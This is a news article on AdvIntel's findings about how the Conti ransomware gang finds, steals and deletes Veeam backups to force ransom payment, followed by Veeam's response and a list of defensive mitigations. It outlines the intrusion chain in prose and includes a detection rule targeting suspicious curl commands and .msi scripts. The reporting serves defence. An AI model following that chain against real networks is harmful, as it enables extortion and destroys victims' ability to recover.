Conti Ransomware Expands Ability to Blow Up Backups

The Conti ransomware gang has developed novel tactics to demolish backups, especially the Veeam recovery software.

Good at identifying and obliterating backups? Speak Russian? The notorious Conti ransomware group may find you a fine hiring prospect.

That’s according to a report published on Wednesday by cyber-risk prevention firm Advanced Intelligence, which details how Conti has honed its backup destruction to a fine art. After all, backups are a major obstacle to encouraging ransomware payment.

A Conti Primer

Palo Alto Networks has described the gang as a standout, and not in a good way: “It’s one of the most ruthless of the dozens of ransomware gangs that we follow,” the firm said.

As of June, Conti had spent more than a year attacking organizations where IT outages can threaten lives: Hospitals, emergency number dispatch carriers, emergency medical services and law-enforcement agencies.

Infosec Insiders Newsletter

An example: In May, Ireland’s department of health services was still reeling a week after a Conti ransomware attack that wasn’t even all that successful. Officials said at the time that the attack would cost tens of millions of Euros to repair, even though the attackers didn’t even manage to encrypt systems.

Its expertise in demolishing backups has helped Conti – a top-tier Russian-speaking ransomware group that specializes in double extortion – to rain down destruction. According to AdvIntel’s Yelisey Boguslavskiy and Vitali Kremez, Conti bases its negotiation strategies on the premise that the majority of targets who pay the ransom are “motivated primarily by the need to restore their data.”

The two-slap whammy of double extortion entails both data encryption and the threat to publish that seized data. However, according to AdvIntel’s collection of Conti ransomware samples, publishing of data as only a secondary motivator for paying up – most particularly if those victims can rely on backups.

“If the victim has the ability to restore the files via backups, the chances of successful ransom payment to Conti will be minimized, even despite the fact that the risk of data-publishing persists,” the researchers wrote.

Conti’s Backup-Obliteration Methodology

AdvIntel has found that Conti builds its backup-removal expertise from the ground up, starting at the “team development level.” Namely, when the ransomware-as-a-service (RaaS) gang recruits workers to invade networks, it’s clear that penetration-tester candidates need top-notch skills at finding and obliterating backups.

“While selecting network intruders for their divisions also known as ‘teams,’ Conti is particularly clear that experience related to back-up identification, localization and deactivation is among their top priorities for a successful pen-tester,” according to AdvIntel’s analysis. “This backup focus implemented within the partnership-building process enables Conti to assemble teams, equipped with knowledge and skills aimed at backup removal.”

Veeam Vivisection

Conti has focused most particularly on developing new ways to compromise back-up software from disaster-recovery firm Veeam, researchers said.

Conti routinely initiates its attacks by installing the Cobalt Strike beacon: A legitimate, commercially available tool originally designed for network-penetration testers. It’s usage by crooks as a backdoor has gone mainstream in the world of crimeware, however.

Conti then leverages another legitimate tool: The remote-management agent Atera. Atera gives the gang persistence in an infected network.

Conti also uses Ngrok, a cross-platform application that exposes local server ports to the internet, to establish a tunnel to the local host for data exfiltration.

In many attacks seen by AdvIntel, this infection routine is followed by Conti operators finding and impersonating a privileged backup user — in order to grant themselves Veeam-backup privileges.

The attackers then typically use a weaponized Rclone – a command line program used to manage files on cloud storage – for data exfiltration of the Veeam backups. Finally, to ensure that the victim has been kneecapped and won’t be able to recover, the Conti attackers lock the victim’s system and manually remove those Veeam backups.

AdvIntel outlined the backup removal steps in the chart below:

Cobalt Strike backup removal sequence. Source: AdvIntel.

“With the Veeam account compromise, Conti has a method to deal with back-up software to ‘force’ ransom payment,” according to the firm’s writeup.

Veeam’s Response

093021 18:58 UPDATE: Rick Vanover, senior director of product strategy for Veeam, provided the following statement to Threatpost:

“There are more options than ever to keep Veeam backup data safe from ransomware. Immutable backup copies on-premises, in the cloud, storage system or unique service provider offerings, or even a combination of these. Veeam has capabilities to drive the highest confidence in data recovery.” —Veeam’s Rick Vanover.

Veeam provides numerous resources on setting up immutable backup and data replication, including this one.

How to Stop Conti’s Backup Destruction

AdvIntel offered these mitigations and recommendations to help fend off Conti backup removal attacks:

    1. To prevent the attack initiations, employee training and email security protocols should be implemented. Conti uses very developed social-engineering techniques in order to convince the victim employees that the targeted emails are legitimate.
    2. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an alternative means for attack initiation. Tracking externally exposed endpoints is therefore critical.
    3. To prevent lateral movement, network-hierarchy protocols should be implemented with network segregation and decentralization.
    4. Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies, with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts — particularly those from C:\ProgramData and C:\Temp directory.
    5. Rclone and other data-exfiltration command-line interface activities can be captured through proper logging of process execution with command-line arguments.
    6. Special security protocols, password updates and account-security measures for Veeam should be implemented to prevent Veeam account takeover. Enabled backups tremendously decrease Conti’s ransom demands and can likely lead to data recovery with zero payments to the Conti collective.

Rule #1 of Linux Security: No cybersecurity solution is viable if you don’t have the basics down. JOIN Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the 4 Golden Rules of Linux Security. Your top takeaway will be a Linux roadmap to getting the basics right! REGISTER NOW and join the LIVE event on Sept. 29 at Noon EST. Joining Threatpost is Uptycs’ Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.

Suggested articles